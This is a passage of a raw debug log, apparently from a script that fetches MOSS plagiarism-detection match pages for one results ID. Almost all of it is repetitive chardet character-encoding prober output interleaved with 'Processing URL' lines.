prober hit error at byte 19250\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16660\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40940\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32463\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19251\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40941\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32463\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19250\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40940\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32464\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32463\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 
0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5571969105980081\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5471271459674764\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5433467222841619\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.87625\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match84-top.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match84-0.html\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match84-1.html\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 
0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5304300423181924\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match91-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match91-0.html\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match91-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match89-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match89-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match89-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 24830\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24817\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25008\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 24830\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24817\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 24995\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25769\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24817\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25008\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 24995\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24818\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25756\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 24995\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25769\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24817\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 24996\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25756\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 24995\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25756\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25757\nDEBUG:chardet.charsetprober:utf-8 confidence = 
0.7525\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25756\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5307566789403784\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5585143132172369\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 
Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5293844120084262\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match95-top.html\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match95-0.html\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match95-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match94-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match94-0.html\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5396503419910391\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match93-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match94-1.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match93-0.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match93-1.html
[chardet.charsetprober DEBUG probes and "DEBUG:root:Processing URL" entries for http://moss.stanford.edu/results/374137986/match88 through match115 (the -top, -0 and -1 pages of each match)]
Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match113-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match113-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match117-top.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17259\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 17246\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17259\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17246\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17246\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17247\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17246\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19305\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36858\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19292\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36845\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19305\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5269681091234343\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36858\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19292\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match117-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match117-1.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19292\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36845\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19293\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36845\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19292\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36846\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36845\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5437249762076334\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 
0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5616347080687375\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 16931\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match116-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match116-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match116-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match120-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match120-0.html\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 16918\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match120-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match118-top.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 16931\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 16918\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 16918\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 16919\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 16918\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 